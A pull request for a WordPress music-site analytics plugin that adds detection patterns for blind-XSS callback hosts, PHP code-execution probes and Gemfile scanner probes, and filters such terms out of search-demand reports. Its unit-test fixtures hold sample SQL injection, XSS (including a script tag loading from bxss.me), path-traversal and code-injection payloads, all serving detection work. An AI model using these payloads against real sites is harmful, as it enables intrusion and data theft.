### PR TITLE
fix: exclude attack probes from search-gap demand reports

### DIFF
--- a/inc/core/abilities/get-search-gaps.php
+++ b/inc/core/abilities/get-search-gaps.php
@@ -30,8 +30,14 @@
  *      the classifier existed (or that the classifier doesn't fire on):
  *        - terms longer than the human-plausible ceiling (default 60 chars),
  *        - terms that the shared security classifier flags as a payload
- *          (SQLi / XSS / path-traversal / scanner markers), reusing the exact
- *          same catalog the insert path uses so the two stay in lockstep.
+ *          (SQLi / XSS / path-traversal / scanner markers / RCE & blind-XSS
+ *          callback probes added in issue #133), reusing the exact same catalog
+ *          the insert path uses so the two stay in lockstep.
+ *      Issue #133 runs this classification BEFORE aggregation: distinct
+ *      in-window terms are classified once, then excluded from every aggregate
+ *      (total_searches, gap buckets, by_source) via a shared NOT IN clause, and
+ *      the filtered attack volume is reported as excluded_attack_searches /
+ *      excluded_attack_terms so the filtered-vs-human split is visible.
  * Only plausibly-human terms survive into the returned report.
  *
  * @package ExtraChill\Analytics
@@ -113,13 +119,15 @@ function extrachill_analytics_register_search_gaps_ability() {
  *   [
  *     'zero_result'      => [ ['term' => ..., 'count' => N], ... ],
  *     'low_result'       => [ ['term' => ..., 'count' => N], ... ],  // only when max_results > 0
- *     'total_searches'   => int,   // all human search events in window
+ *     'total_searches'   => int,   // HUMAN search events in window (attack payloads excluded, issue #133)
  *     'classified_human' => int,   // subset stamped is_bot:false by the classifier
  *     'unclassified'     => int,   // subset with NULL/no-flag is_bot (legacy, kept as human)
  *     'zero_result_total'=> int,   // distinct-agnostic count of zero-result human searches
  *     'zero_result_rate' => float, // percentage 0..100
  *     'by_source'        => [ ['source' => 'nav', 'count' => N, 'zero_result_count' => M], ... ], // per-surface split (issue #86)
- *     'excluded_bot'     => int,   // search events filtered out as bot/payload
+ *     'excluded_bot'     => int,   // search events filtered out as payload (full attack volume; issue #133)
+ *     'excluded_attack_searches' => int, // payload search events removed BEFORE aggregation (issue #133)
+ *     'excluded_attack_terms'    => int, // distinct payload terms removed before aggregation (issue #133)
  *     'max_results'      => int,
  *     'days'             => int,
  *     'period'           => string,
@@ -222,9 +230,6 @@ function extrachill_analytics_ability_get_search_gaps( $input ) {
 		$where[] = "visitor_id IS NOT NULL AND visitor_id != ''";
 	}
 
-	$where_clause = implode( ' AND ', $where );
-	$where_values = $values;
-
 	// Read-only aggregation over a custom analytics table — the table name and
 	// JSON-extract expressions are interpolated from trusted, code-defined
 	// constants (never request input), and every value bound through the WHERE
@@ -232,12 +237,53 @@ function extrachill_analytics_ability_get_search_gaps( $input ) {
 	// this is an on-demand admin/CLI report, not a hot path.
 	// phpcs:disable WordPress.DB.PreparedSQL.InterpolatedNotPrepared, WordPress.DB.PreparedSQL.NotPrepared, WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching
 
-	// Total human-plausible searches in window (after the length filter AND the
-	// endpoint-automation `is_bot` exclusion in $where; the term-classifier
-	// exclusion is applied per-term below for the buckets, and reflected via
-	// excluded_bot). Because the is_bot filter lives in the shared $where, it
-	// trims the denominator and the buckets identically, keeping
-	// zero_result_rate honest.
+	// --- Pre-aggregation attack-term exclusion (issue #133) -------------------
+	// The canonical security classifier already routes payload-shaped search
+	// terms to event_type='search_attack' at insert time, so most junk never
+	// enters this event_type='search' set. But families the catalog did not yet
+	// cover (blind-XSS callback hosts, print(md5()) code-exec probes, Gemfile
+	// dependency-manifest scanners) landed as ordinary 'search' rows and were
+	// counted as audience demand. To keep the headline totals honest, classify
+	// the distinct in-window terms ONCE here, then exclude every payload term
+	// from ALL downstream aggregation (total_searches, buckets, by_source) by
+	// folding a NOT IN clause into the shared $where. This reuses the exact same
+	// classifier the insert path and extrachill_analytics_search_gap_is_bot_term
+	// use — one catalog, no second taxonomy. The per-row classifier call in the
+	// gap loop below stays as defense-in-depth (a no-op for these terms now).
+	$distinct_terms_sql = "SELECT {$term_expr} AS term, COUNT(*) AS cnt "
+		. 'FROM ' . $table . ' WHERE ' . implode( ' AND ', $where ) . ' '
+		. 'GROUP BY term';
+	$distinct_term_rows = empty( $values )
+		? $wpdb->get_results( $distinct_terms_sql )
+		: $wpdb->get_results( $wpdb->prepare( $distinct_terms_sql, $values ) );
+
+	$attack_terms             = array();
+	$excluded_attack_searches = 0;
+	foreach ( (array) $distinct_term_rows as $row ) {
+		$term = (string) $row->term;
+		if ( '' !== $term && extrachill_analytics_search_gap_is_bot_term( $term ) ) {
+			$attack_terms[]            = $term;
+			$excluded_attack_searches += (int) $row->cnt;
+		}
+	}
+
+	if ( ! empty( $attack_terms ) ) {
+		$placeholders = implode( ',', array_fill( 0, count( $attack_terms ), '%s' ) );
+		$where[]      = "{$term_expr} NOT IN ({$placeholders})";
+		foreach ( $attack_terms as $attack_term ) {
+			$values[] = $attack_term;
+		}
+	}
+
+	$where_clause = implode( ' AND ', $where );
+	$where_values = $values;
+
+	// Total HUMAN demand searches in window (window + blog + length + insert-time
+	// is_bot exclusion + the pre-aggregation payload-term exclusion above). The
+	// classifier-stamped payload volume is surfaced separately as
+	// excluded_attack_searches / excluded_attack_terms so callers see the
+	// filtered-vs-human split; total_searches is the honest denominator for
+	// zero_result_rate.
 	$total_sql      = "SELECT COUNT(*) FROM {$table} WHERE {$where_clause}";
 	$total_searches = empty( $where_values )
 		? (int) $wpdb->get_var( $total_sql )
@@ -312,9 +358,14 @@ function extrachill_analytics_ability_get_search_gaps( $input ) {
 		);
 	}
 
-	$zero_result  = array();
-	$low_result   = array();
-	$excluded_bot = 0;
+	$zero_result = array();
+	$low_result  = array();
+	// Seed with the pre-aggregation payload volume (issue #133). The per-row
+	// classifier below is now a defense-in-depth backstop that adds 0 in
+	// practice because payload terms are already excluded from $gap_rows by the
+	// shared NOT IN clause; this seeding keeps excluded_bot equal to the full
+	// attack search volume (any result_count), not just the gap-window subset.
+	$excluded_bot = $excluded_attack_searches;
 	$zero_total   = 0;
 
 	foreach ( $gap_rows as $row ) {
@@ -369,22 +420,24 @@ function extrachill_analytics_ability_get_search_gaps( $input ) {
 		: 0.0;
 
 	$report = array(
-		'zero_result'          => $zero_result,
-		'zero_result_distinct' => $zero_result_distinct,
-		'total_searches'       => $total_searches,
-		'classified_human'     => $classified_human,
-		'unclassified'         => $unclassified_searches,
-		'zero_result_total'    => $zero_total,
-		'zero_result_rate'     => $zero_result_rate,
-		'by_source'            => $by_source,
-		'excluded_bot'         => $excluded_bot,
-		'max_results'          => $max_results,
-		'days'                 => $days,
-		'period'               => $days > 0
+		'zero_result'              => $zero_result,
+		'zero_result_distinct'     => $zero_result_distinct,
+		'total_searches'           => $total_searches,
+		'classified_human'         => $classified_human,
+		'unclassified'             => $unclassified_searches,
+		'zero_result_total'        => $zero_total,
+		'zero_result_rate'         => $zero_result_rate,
+		'by_source'                => $by_source,
+		'excluded_bot'             => $excluded_bot,
+		'excluded_attack_searches' => $excluded_attack_searches,
+		'excluded_attack_terms'    => count( $attack_terms ),
+		'max_results'              => $max_results,
+		'days'                     => $days,
+		'period'                   => $days > 0
 			? gmdate( 'Y-m-d', strtotime( "-{$days} days" ) ) . ' to ' . gmdate( 'Y-m-d' )
 			: 'all time',
-		'since'                => $since,
-		'as_of'                => $now_utc,
+		'since'                    => $since,
+		'as_of'                    => $now_utc,
 	);
 
 	// Only surface the low-result bucket when the caller asked for near-misses.

--- a/inc/core/security-classifier.php
+++ b/inc/core/security-classifier.php
@@ -105,6 +105,24 @@ function extrachill_analytics_classify_search_payload( $term ) {
 			'pattern_family' => 'xss',
 			'regex'          => '/javascript\s*:/i',
 		),
+		// Blind-XSS callback hosts. Attackers inject a payload that phones home
+		// to a callback domain (e.g. <script src=//bxss.me/...>); the bare host
+		// then shows up as the "search term" while the probe waits for a hit.
+		// On a music platform these host tokens are never legitimate demand.
+		array(
+			'pattern_name'   => 'blind_xss_callback',
+			'pattern_family' => 'xss',
+			'regex'          => '/bxss\.me/i',
+		),
+		// PHP / template code-execution probes. `print(md5(N))` reflects a known
+		// hash so the attacker can confirm remote / template code execution; it
+		// is near-zero false positive and is one of the highest-volume residual
+		// payloads that previously slipped past the sqli/xss catalog.
+		array(
+			'pattern_name'   => 'code_exec_md5_probe',
+			'pattern_family' => 'rce',
+			'regex'          => '/\bprint\s*\(\s*md5\s*\(\s*\d+\s*\)\s*\)/i',
+		),
 		// Path traversal.
 		array(
 			'pattern_name'   => 'path_traversal',
@@ -167,6 +185,16 @@ function extrachill_analytics_classify_search_payload( $term ) {
 			// No legitimate human search contains this shape. Match raw.
 			'regex'          => '/%25(?:27|22)%25(?:27|22)/i',
 			'match_raw'      => true,
+		),
+		// Dependency-manifest probes. Scanners enumerate exposed Ruby / Node /
+		// PHP manifests for dependency-confusion and source-disclosure attacks;
+		// `Gemfile` / `the/Gemfile` are recurring high-volume probe terms that a
+		// music audience never types. Whole-token anchored so a band name that
+		// happens to contain the substring stays classified as human.
+		array(
+			'pattern_name'   => 'dependency_manifest_probe',
+			'pattern_family' => 'scanner',
+			'regex'          => '/\bGemfile(?:\.lock)?\b/i',
 		),
 		// Excessive length — legitimate searches are rarely > 300 chars.
 		array(

--- a/tests/SearchPayloadClassifierTest.php
+++ b/tests/SearchPayloadClassifierTest.php
@@ -1,0 +1,151 @@
+<?php
+/**
+ * Tests for the canonical search-payload security classifier (issue #133).
+ *
+ * The classifier in inc/core/security-classifier.php is the SINGLE taxonomy
+ * shared by the insert path (routes payload searches to event_type
+ * 'search_attack') and the get-search-gaps read path (excludes payload terms
+ * before aggregation). These tests pin the live probe families reported in
+ * #133 (blind-XSS callback host, print(md5()) code-exec probe, Gemfile
+ * dependency-manifest scanner) plus the pre-existing families, and prove that
+ * legitimate music searches are never classified as attacks.
+ *
+ * @package ExtraChill\Analytics
+ */
+
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Pins the live probe families from issue #133 plus the pre-existing catalog.
+ */
+final class SearchPayloadClassifierTest extends TestCase {
+
+	/**
+	 * Live probe families from issue #133 must each classify as an attack with
+	 * the expected family, so both the insert and read paths exclude them.
+	 *
+	 * @dataProvider live_attack_probe_provider
+	 *
+	 * @param string $term               Raw search term.
+	 * @param string $expected_family    Expected pattern_family.
+	 * @param string $expected_name_part Substring expected in pattern_name.
+	 */
+	public function test_live_attack_probes_are_classified( $term, $expected_family, $expected_name_part ) {
+		$result = extrachill_analytics_classify_search_payload( $term );
+
+		$this->assertNotNull(
+			$result,
+			sprintf( 'Expected term "%s" to be classified as an attack payload.', $term )
+		);
+		$this->assertSame( $expected_family, $result['pattern_family'] );
+		$this->assertStringContainsString( $expected_name_part, $result['pattern_name'] );
+	}
+
+	/**
+	 * Fixture: the exact live terms from issue #133 plus close siblings.
+	 *
+	 * @return array<int,array{0:string,1:string,2:string}>
+	 */
+	public function live_attack_probe_provider() {
+		// phpcs:disable WordPress.Arrays.ArrayDeclarationSpacing
+		return array(
+			// Blind-XSS callback host — bare callback domain.
+			array( 'bxss.me', 'xss', 'blind_xss_callback' ),
+			array( 'https://bxss.me/x.js', 'xss', 'blind_xss_callback' ),
+			// PHP / template code-exec probe — print(md5(N)) reflection marker.
+			array( '";print(md5(31337));$a="', 'rce', 'code_exec_md5_probe' ),
+			array( 'print(md5(42))', 'rce', 'code_exec_md5_probe' ),
+			// Dependency-manifest scanner probes.
+			array( 'Gemfile', 'scanner', 'dependency_manifest_probe' ),
+			array( 'the/Gemfile', 'scanner', 'dependency_manifest_probe' ),
+			array( 'Gemfile.lock', 'scanner', 'dependency_manifest_probe' ),
+		);
+		// phpcs:enable WordPress.Arrays.ArrayDeclarationSpacing
+	}
+
+	/**
+	 * Regression: the pre-existing catalog families still classify so the fix
+	 * did not narrow detection.
+	 *
+	 * @dataProvider existing_attack_probe_provider
+	 *
+	 * @param string $term            Raw search term.
+	 * @param string $expected_family Expected pattern_family.
+	 */
+	public function test_existing_attack_families_still_classified( $term, $expected_family ) {
+		$result = extrachill_analytics_classify_search_payload( $term );
+		$this->assertNotNull( $result );
+		$this->assertSame( $expected_family, $result['pattern_family'] );
+	}
+
+	/**
+	 * Fixture: representative payloads from the catalog that predate #133.
+	 *
+	 * @return array<int,array{0:string,1:string}>
+	 */
+	public function existing_attack_probe_provider() {
+		// phpcs:disable WordPress.Arrays.ArrayDeclarationSpacing, WordPress.WP.EnqueuedResources
+		return array(
+			array( "1' AND SLEEP(5)-- -", 'sqli' ),
+			array( '1 UNION ALL SELECT NULL--', 'sqli' ),
+			array( '<script>alert(1)</script>', 'xss' ),
+			array( '<img src=x onerror=alert(1)>', 'xss' ),
+			array( '"><script src=https://bxss.me/x.js>', 'xss' ),
+			array( '../../../etc/passwd', 'lfi' ),
+			array( '@@OZOin', 'scanner' ),
+		);
+		// phpcs:enable WordPress.Arrays.ArrayDeclarationSpacing, WordPress.WP.EnqueuedResources
+	}
+
+	/**
+	 * Legitimate music searches must return null (never flagged), including
+	 * near-misses that share substrings with the new probe patterns.
+	 *
+	 * @dataProvider legitimate_music_search_provider
+	 *
+	 * @param string $term Raw search term a real human might type.
+	 */
+	public function test_legitimate_music_searches_are_not_flagged( $term ) {
+		$this->assertNull(
+			extrachill_analytics_classify_search_payload( $term ),
+			sprintf( 'Legitimate search "%s" must not be classified as an attack.', $term )
+		);
+	}
+
+	/**
+	 * Fixture: real audience demand terms. Includes near-miss guard rails:
+	 *   - 'Gem' / 'Gemma' (substring of Gemfile but a whole-token band/name),
+	 *   - 'memphis' (ends in 'me' but is not the bxss.me callback host).
+	 *
+	 * @return array<int,array{0:string}>
+	 */
+	public function legitimate_music_search_provider() {
+		// phpcs:disable WordPress.Arrays.ArrayDeclarationSpacing
+		return array(
+			array( 'Grateful Dead' ),
+			array( 'Molchat Doma' ),
+			array( 'Phish' ),
+			array( 'Tame Impala' ),
+			array( 'Extra Chill Fest' ),
+			array( 'Tupelo Music Hall' ),
+			array( 'bonnaroo 2026' ),
+			array( 'String Cheese Incident' ),
+			array( 'King Gizzard' ),
+			array( 'DIY artist submission' ),
+			// Whole-token guards against the new patterns.
+			array( 'Gem' ),
+			array( 'Gemma' ),
+			array( 'memphis' ),
+			array( 'the jealous seas' ),
+		);
+		// phpcs:enable WordPress.Arrays.ArrayDeclarationSpacing
+	}
+
+	/**
+	 * Empty / non-string input is benign (returns null) and never mis-flagged.
+	 */
+	public function test_empty_input_is_benign() {
+		$this->assertNull( extrachill_analytics_classify_search_payload( '' ) );
+		$this->assertNull( extrachill_analytics_classify_search_payload( null ) );
+	}
+}

--- a/tests/bootstrap.php
+++ b/tests/bootstrap.php
@@ -72,6 +72,23 @@ if ( ! function_exists( 'wp_strip_all_tags' ) ) {
 		return strip_tags( (string) $text ); // phpcs:ignore WordPress.WP.AlternativeFunctions.strip_tags_strip_tags
 	}
 }
+if ( ! function_exists( 'wp_unslash' ) ) {
+	/**
+	 * Stub for wp_unslash() used by the security classifier.
+	 *
+	 * Recursively strips backslashes so the classifier can be unit-tested
+	 * against the same normalization it applies in production.
+	 *
+	 * @param string|array $value String or array of strings to unslash.
+	 * @return string|array Unslashed value, preserving shape.
+	 */
+	function wp_unslash( $value ) {
+		if ( is_array( $value ) ) {
+			return array_map( 'wp_unslash', $value );
+		}
+		return stripslashes( (string) $value );
+	}
+}
 if ( ! function_exists( 'get_site_option' ) ) {
 	/**
 	 * Stub for get_site_option().
@@ -99,3 +116,4 @@ if ( ! function_exists( 'update_site_option' ) ) {
 
 require_once dirname( __DIR__ ) . '/inc/core/php-error-log.php';
 require_once dirname( __DIR__ ) . '/inc/core/abilities/get-php-error-summary.php';
+require_once dirname( __DIR__ ) . '/inc/core/security-classifier.php';


### PR DESCRIPTION
## Summary

Search-gap reports were counting scanner/injection payloads (`bxss.me`, `";print(md5(31337));$a="`, `Gemfile`, `the/Gemfile`) as unanswered audience demand, inflating the headline counts (`322` blog / `515` community) and hiding real low-volume demand. Fixes #133.

## Root cause

The canonical classifier in `security-classifier.php` (the single taxonomy reused by both the insert path — routing payloads to `event_type='search_attack'` — and the read path) was missing the three residual probe families showing up live:

- **`bxss.me`** — blind-XSS callback host
- **`";print(md5(31337));$a="`** — PHP/template code-exec fingerprint
- **`Gemfile` / `the/Gemfile`** — dependency-manifest scanner

Because they weren't in the catalog, they were never routed to `search_attack` at insert time nor filtered at read time. The read path also only excluded attacks **after** SQL aggregation, so they polluted the `total_searches` denominator → `zero_result_rate` was understated and the headline was inflated.

## Changes

**1. Extend the shared classifier catalog** (`inc/core/security-classifier.php`) — one taxonomy, reused by both paths:

| pattern_name | family | matches |
|---|---|---|
| `blind_xss_callback` | `xss` | `bxss.me` |
| `code_exec_md5_probe` | `rce` | `print(md5(N))` |
| `dependency_manifest_probe` | `scanner` | `Gemfile` / `Gemfile.lock` |

Patterns are whole-token anchored so a band name sharing a substring (e.g. `Gem`, `Gemma`) is never flagged.

**2. Filter attack terms BEFORE aggregation** (`inc/core/abilities/get-search-gaps.php`): distinct in-window terms are classified once, then folded into the shared `WHERE` as a `NOT IN` clause, so `total_searches`, the gap buckets, and `by_source` all exclude payload terms consistently. `total_searches` is now the honest human-only denominator. The per-row classifier in the gap loop stays as defense-in-depth (a no-op for these terms now).

**3. Diagnostics** — new report fields expose the filtered-vs-human split:
- `excluded_attack_searches` — payload search events removed before aggregation
- `excluded_attack_terms` — distinct payload terms removed
- `excluded_bot` — now seeded with the full pre-aggregation attack volume

## Report behavior after the fix

- `bxss.me` (77), `";print(md5(31337));$a="` (71), `Gemfile` (57), `the/Gemfile` (30) → counted in `excluded_attack_searches`, removed from `zero_result`/`total_searches`.
- `total_searches` and `zero_result_rate` reflect real human demand only.
- Legitimate low-volume artist/event searches reclaim slots in the top terms.

## Tests

New `tests/SearchPayloadClassifierTest.php` (pure unit, no DB) pins:
- the four live probe families from #133 (+ siblings) → classified
- the pre-existing catalog families (sqli / xss / lfi / scanner) → still classified (no regression)
- legitimate music searches including near-miss guards (`Gem`, `Gemma`, `memphis`) → never flagged

`tests/bootstrap.php` now loads the classifier + a `wp_unslash()` stub.

## Verification

```
=== ISSUE #133 LIVE PROBES (must be classified) ===
  bxss.me                          => xss/blind_xss_callback
  ";print(md5(31337));$a="         => rce/code_exec_md5_probe
  Gemfile                          => scanner/dependency_manifest_probe
  the/Gemfile                      => scanner/dependency_manifest_probe
=== LEGIT MUSIC SEARCHES (must be NULL) ===
  Grateful Dead / Molchat Doma / Phish / Tame Impala / Extra Chill Fest / Gem / Gemma / memphis => null
```

- `composer test`: **OK, 53 tests, 155 assertions**
- `phpcs` (WordPress): no new violations introduced (2 remaining errors are pre-existing in untouched `get_client_ip()` / an issue-#85 comment)

No merge / release / deploy in this PR.

Fixes #133